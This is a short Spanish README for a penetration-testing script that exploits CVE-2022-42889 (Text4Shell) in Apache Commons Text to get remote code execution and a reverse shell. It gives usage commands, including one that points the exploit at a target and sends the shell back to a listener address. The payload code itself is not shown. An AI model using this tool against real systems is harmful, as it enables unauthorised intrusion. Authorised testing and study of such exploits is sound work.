
Prueba de Concepto (PoC) para CVE-2022-42889 (Text4Shell) dirigida a versiones de Apache Commons Text anteriores a la 1.10.0. Este script automatiza la Ejecución Remota de Código (RCE) mediante interpolación de scripts para establecer una shell inversa. Esta versión es una optimización estructurada basada en el exploit original encontrado en Exploit-DB (ID: 52261).
Este script es una herramienta de pruebas de penetración diseñada para explotar la vulnerabilidad CVE-2022-42889, también conocida como Text4Shell, en Apache Commons Text (versiones < 1.10.0). Automatiza el envío de un payload basado en Java para desencadenar una reverse shell.
Esta implementación se basa en el exploit público: https://www.exploit-db.com/exploits/52261
El script requiere Python 3 y la librería requests.
pip install requests
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139
Esta herramienta está destinada únicamente a fines educativos y pruebas de penetración autorizadas. El autor no es responsable de ningún uso indebido o daño causado por este script.